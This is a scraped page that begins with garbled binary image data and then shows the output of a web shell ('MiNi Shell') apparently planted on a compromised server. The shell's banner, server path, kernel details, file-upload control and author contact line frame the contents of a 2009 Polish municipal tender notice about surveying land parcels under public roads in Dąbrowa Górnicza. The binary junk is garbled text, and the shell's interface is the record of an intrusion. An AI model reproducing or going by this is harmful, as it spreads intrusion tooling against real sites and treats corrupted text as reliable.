JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090312/49635-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Wykonanie projektów podziałów nieruchomości zajętych pod drogi publiczne na terenie Gminy Dąbrowa Górnicza (gminne, powiatowe, wojewódzkie).</b><br>
<b>Numer ogłoszenia: 49635 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów podziałów nieruchomości zajętych pod drogi publiczne na terenie Gminy Dąbrowa Górnicza (gminne, powiatowe, wojewódzkie)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie: 
- projektów podziałów nieruchomości stanowiących własność osób fizycznych lub prawnych, a zajętych pod drogi publiczne,
- wprowadzanie zmian do rejestrów ewidencji gruntów, polegających na uregulowaniu stanu prawnego w myśl art. 73 ustawy z dnia 13 października 1998r. - przepisy wprowadzające ustawy reformujące administrację publiczną (Dz.U. Z 1998r. Nr 133, poz. 87 z późn. zmianami).
Wymagania techniczne, technologiczne i organizacyjne stawiane Wykonawcom przystępującym do zamówienia publicznego:
1. Podziałowi podlegać będą działki faktycznie, częściowo zajęte pod drogi publiczne. Wybór działek, będących przedmiotem podziału należy do Wykonawcy, przy czym należy spełnić następujący warunek:
- w celu stwierdzenia faktycznego zajęcia działki pod drogę publiczną należy wykorzystać przyjętą do zasobu geodezyjnego i kartograficznego dokumentację geodezyjno - kartograficzną (w tym operat KERG - opracowanie mapy do celów projektowych w skali 1:500 obejmującej zakres przedmiotowej drogi) oraz w razie wątpliwości wykonać pomiar na gruncie pasa drogowego, wykorzystując dostępne techniki pomiarów geodezyjnych, uzgadniając uprzednio zakres faktycznej zajętości z zarządcą drogi,
- punkty graniczne wyznaczające granice nowo wydzielanych działek, należy markować w terenie rurami stalowymi o średnicy min. 50 mm i długości min. 0,6 m, przy czym wystającą nad ziemią część rury należy pomalować farbą koloru żółtego,
- produkt finalny stanowić będzie dokumentacja geodezyjno - kartograficzna, obejmująca przedmiot zamówienia, opatrzona właściwymi klauzulami nadanymi przez Ośrodek Dokumentacji Geodezyjnej i Kartograficznej,
- wykonanie wykazów zmian gruntowych niezbędnych do uregulowania stanu prawnego nieruchomości podlegających podziałowi. Wykazy zmian gruntowych należy opracować dla nieruchomości, które posiadają wykazany z dziale I Księgi wieczystej odmienny stan do tego, który figuruje w operacie ewidencji gruntów,
- skompletowanie dokumentów dla działek podzielonych (mapy uzupełniające z podziału, kopie mapy zasadniczej, wypisy z rejestru gruntów, badanie ksiąg wieczystych).
Wymagania organizacyjne.
Zamawiający przekaże wyłonionemu wykonawcy następujące materiały:
-decyzje o lokalizacji inwestycji celu publicznego,
-mapę z orientacyjnym zakresem zajętości  terenu, 
-wykaz właścicieli nieruchomości zajętych częściowo pod drogi publiczne. 

Zamawiającemu należy przekazać:
- zarejestrowane w Ośrodku Dokumentacji Geodezyjnej mapy projektu podziału i wykazy zmian gruntowych w 4-ch egzemplarzach,
- protokół badania ksiąg wieczystych lub protokół potwierdzający ich brak,
- kopie szkiców i protokołów przyjęcia granic działki do podziału,
- kopie szkiców i protokołów wyznaczenia na grunt projektu podziału,
- kopie wykazów współrzędnych punktów osnowy geodezyjnej,
- zbiorcze tabelaryczne zestawienie nieruchomości.

Dokumentację geodezyjną podziału nieruchomości należy wykonać i kompletować zgodnie z art. 92-97 ustawy z dnia 12 sierpnia 1997r. o gospodarce nieruchomościami (Dz.U. z 2000r. Nr 46, poz. 543 z późn. zmianami), Rozporządzeniem Rady Ministrów z dnia 7 grudnia 2004r. w sprawie sposobu i. trybu dokonywania podziałów nieruchomości; standardami obowiązującymi w geodezji. 
Podstawą odbioru usług i wystawienia faktur częściowych będzie protokół wykonanych prac.
Wykonawca zobowiązany jest dysponować brygadą roboczą oraz sprzętem umożliwiającym wykonanie zadania zgodnie z obowiązującymi w tym zakresie normami. 
Wykonawca poniesie pełną odpowiedzialność odszkodowawczą za ewentualne szkody użytkowników  nieruchomości, w związku z niewłaściwą lub nieterminową realizacją określonego na piśmie  zakresu rzeczowego usługi.  
Zamawiający udostępni specyfikację techniczną na opracowanie dokumentacji geodezyjnej. 
UWAGA: -  Wskazane  jest aby Wykonawcy po zapoznaniu się z materiałami przetargowymi dokonali wizji lokalnej na obiekcie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia określonego w specyfikacji mogą ubiegać się wykonawcy, którzy:
1.Spełniają wymagania określone w art. 22 ust. 1 Ustawy Pzp i nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Ustawy Pzp.
2.Nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne i zdrowotne z wyjątkiem przypadków, gdy uzyskali oni przewidzianą prawem zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
3.Dysponują osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia tj. posiadających uprawnienia geodezyjno-kartograficzne. W wykazie należy uwzględnić co najmniej 5 osób, które będą uczestniczyć w realizacji zamówienia, z czego 2 osoby winny posiadać wymagane uprawnienia geodezyjno-kartograficzne. Dopuszczalne jest posiadanie więcej niż jednego uprawnienia przez jedną osobę.
4.W okresie ostatnich 3-ch lat przed dniem wszczęcia postępowania o udzielenie zamówienia lub w okresie działalności, jeżeli była krótsza niż 3 lata, wykonali usługi  - a w przypadku świadczeń okresowych i ciągłych również są w trakcie wykonywania - odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia. Przez usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia należy rozumieć usługę w zakresie dokonywania projektów podziałów  geodezyjnych, wprowadzania zmian do zasobów geodezyjnych, wykonywania map z  naniesionymi punktami granicznymi na wartość ogólną zamówień min. 50 tyś zł. brutto.
5.Złożą oświadczenie o uzyskaniu pisemnego potwierdzenia o udostępnieniu danych dotyczących usługi z Ośrodka Geodezyjno- Kartograficznego.  
UWAGA:
Stwierdzenie spełniania warunków - udziału w postępowaniu (formalnych) i zdolności do wykonania zamówienia (merytorycznych)- wymaganych od Wykonawców będzie dokonane w oparciu o złożone wraz z ofertą: oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego oraz potwierdzające (spełnienie tych warunków)dokumenty- według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwiedzenie spełniania warunków udziału w postępowaniu o których mowa w pkt. 9 siwz, Wykonawca jest zobowiązany dostarczyć następujace dokumenty:
1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.Oświadczenie, że Wykonawca spełnia wymagania określone w art. 22 ust. 1 Pzp i nie podlega 
wykluczeniu z postępowania na podst. art. 24 ust. 1 i 2 Pzp - (Załącznik nr 2) - wskazana data 
podpisania oświadczenia.
3.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, potwierdzających spełnienie warunku określonego w pkt 10.3. SIWZ -  (Załącznik nr 3) - wskazana data podpisania oświadczenia.
4.1.Dokumanty potwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia geodezyjno-kartograficzne, min. 2 szt.  
4.2.  W przypadku przedstawienia w wykazie osób, którymi Wykonawca będzie dysponował za zgodą innych podmiotów wymagane jest przedłożenie pisemnego zobowiązania tych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia (wzór oświadczenia - Załącznik nr 3a).
5.Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres  prowadzenia  działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, potwierdzających spełnienie warunku określonego w pkt 10.4. SIWZ -  (Załącznik   nr 4) - wskazana data podpisania oświadczenia.
Uwaga: Jeżeli zakres wykazanych i udokumentowanych usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie usług wskazać wartość prac odpowiadających zakresowi przedmiotu zamówienia.
5.1. Dokumenty potwierdzające że usługi o których mowa w pkt.5 zostały wykonane należycie- np. referencje wystawione przez poprzednich zamawiających.
6. Formularz ofertowy -  (Załącznik nr 1) - wskazana data podpisania oferty.
7.Oświadczenie o uzyskaniu pisemnego potwierdzenia o udostępnieniu danych dot. usługi z Ośrodka Geodezyjno- Kartograficznego, załącznik nr 1 pkt. 8 - Formularz ofertowy.
8. Pełnomocnictwo do reprezentowania.
8.1. Wymagane w  przypadku gdy Wykonawcę reprezentuje w przetargu osoba bądź osoby, których uprawnienie do reprezentacji nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza.
8.2 Wymagane w przypadku Wykonawców wspólnie ubiegających się o zamówienie, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza.
Uwagi: 
1. Złożone dokumenty winny być zgodne z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane ( Dz. U. nr 87 poz. 605 z późn. zm.).
2. Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną /dotyczącą składania nieprawdziwych zeznań i oświadczeń/ wynikającą z art. 297 Kodeksu Karnego. W razie stwierdzenia, że złożone przez wykonawcę lub wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 k.p.k. - zawiadomi o tym fakcie właściwy organ ścigania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Komunikacji i Drogownictwa , pokój nr 316 piętro III..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 10:00, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Komunikacji i Drogownictwa , pokój nr 316 piętro III..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com